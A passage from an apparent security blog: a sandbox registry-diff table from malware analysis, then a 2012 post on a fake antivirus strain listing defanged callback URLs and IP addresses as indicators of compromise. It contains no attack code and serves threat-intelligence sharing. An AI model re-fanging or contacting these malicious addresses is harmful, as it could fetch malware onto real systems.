<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td><span style="color: black; font-size: xx-small;">DesktopShortcut</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"no"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td><span style="color: black; font-size: xx-small;">QuickLaunchShortcut</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\CreatedLinks</span></td>
<td><span style="color: black; font-size: xx-small;">Shortcut4</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Uninstall</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\My Documents\pcap"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\My Documents\pcap"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage</span></td>
<td><span style="color: black; font-size: xx-small;">StartMenu_Balloon_Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:b0,27,b0,17,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:f0,f5,4b,1c,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,10,00,00,00,50,e8,07,19,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,14,00,00,00,90,71,d8,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\pzq.rkr</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,d0,cf,da,d9,de,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,90,2d,68,fb,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Vagrearg Rkcybere\VRKCYBER.RKR</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,e4,6a,a6,dd,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,d0,f4,ef,4e,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,80,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,44,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000005</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,35,00,e0,03,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1e,00,05,00,51,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,05,00,0b,00,3c,02,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1c,00,26,00,a0,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,28,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,b0,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">LoadTime</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000088</span></td>
<td><span style="color: black; font-size: xx-small;">dword:0000009d</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2a,00,c6,03,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1c,00,22,00,04,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,ab,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,50,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@xpsp1res.dll,-11005</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sends and receives e-mail and newsgroup messages."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Wireshark\wireshark.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Wireshark"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Common Files\Java\Java Update\jucheck.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Java(TM) Update Checker"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Windows Media Player\setup_wm.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Microsoft Windows Media Configuration Utility"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\taskmgr.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows TaskManager"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\explorer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Explorer"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@xpsp3res.dll,-20000</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Network Diagnostics for Windows XP"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@shell32.dll,-12691</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"My Recent Documents"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@C:\WINDOWS\system32\SHELL32.dll,-9217</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"My Network Places"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\inf\unregmp2.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Microsoft Windows Media Player Setup Utility"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Windows Media Player\wmplayer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General</span></td>
<td><span style="color: black; font-size: xx-small;">UniqueID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{ECE4B67E-5176-48A8-A4E7-7CD222821F18}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General</span></td>
<td><span style="color: black; font-size: xx-small;">ComputerName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"SANDBOX"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General</span></td>
<td><span style="color: black; font-size: xx-small;">VolumeSerialNumber</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:20d334b5</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">LocalBase</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">DTDFile</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">LocalDelta</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">RemoteDelta</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\wmplayer.exe"</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">C:\PROGRA~1\WINDOW~2\wmplayer.exe</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Program Files\Windows Media Player\wmplayer.exe"</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Windows Media Player\wmplayer.exe</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\SessionInformation</span></td>
<td><span style="color: black; font-size: xx-small;">ProgramCount</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000005</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\explorer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Explorer"</span></td>
</tr>
</tbody></table>
<br />
Hope you found this informative.
<br />
<br />
<br />
<b>Fake AV Strain - New URL Callbacks</b><br />
Posted 2012-09-15<br />
<br />
I have observed a new fake AV strain in the wild at a site that does not have Layer 7 forensics. They do, however, have full URL logging which enabled me to backtrack the events and callouts to what appears to be a total of 15 separate sites. The common string among them appears to be that many of them are <span style="font-family: 'Courier New', monospace; font-size: 13px;">Registrar: BIZCN.COM, INC.</span><br />
<br />
The malware in this case was very noisy to the user, changed attributes to hidden on all files in the system and changed GP settings.<br />
<br />
The infection point in the case I investigated was a random ftp1.biz website. The user searched online for a specific type of weight lifting technique, was redirected from a legitimate page to the ftp1.biz and hit with an exploit kit of unknown type which was successful.<br />
<br />
Two points were interesting in this case:<br />
1. Once the user ran combofix, malwarebytes and Windows updates on their workstation, the system appears to call back out through a series of different octet-stream requests.<br />
2. The URLs follow a pattern that appears to be new (fresh in the last 2 days according to urlquery.net).<br />
<br />
Here are the URLs in order, in case anyone else runs into them.<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php<br />
<br />
Some information on this URL exists in urlquery. The researched links here have contained only two direct-to-IP requests, 174.140.166.71 and 46.249.37.122.<br />
<br />
<br />
http://urlquery.net/report.php?id=177843<br />
http://urlquery.net/report.php?id=177013<br />
<br />
<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?udvf=03080407333603030a3302340235073836093508033706363836353505080833&tvaxpmbue=0a09380b0a3508360208&rdm=02&bnvru=dolz&gwxjfli=ewsxs<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?iwzwf=03080407333603030a3302340235073836093508033706363836353505080833&biwoe=03090708363335340408&qymzixvp=02&amoo=vypv&kcdo=ljyuum<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?psgm=03080407333603030a3302340235073836093508033706363836353505080833&ygxrse=333d&xfkcr=iqu&rhdays=ewmp<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?psgm=03080407333603030a3302340235073836093508033706363836353505080833&ygxrse=333d&xfkcr=iqu&rhdays=ewmp<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?yxuaovb=03080407333603030a3302340235073836093508033706363836353505080833&cgqua=47&jgysdt=030907083633353404080c0c0a09380b0a3508360208&hwalpqs=0302000200020002<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?psgm=03080407333603030a3302340235073836093508033706363836353505080833&ygxrse=333d&xfkcr=iqu&rhdays=ewmp<br />
<br />
The next URL is indicative of known Fake AV URLs.<br />
<br />
hxxp://175.41.28.157/api/urls/?ts=3e73d632&affid=60830<br />
<br />
As seen, for example, here:<br />
http://urlquery.net/report.php?id=177167<br />
<br />
<br />
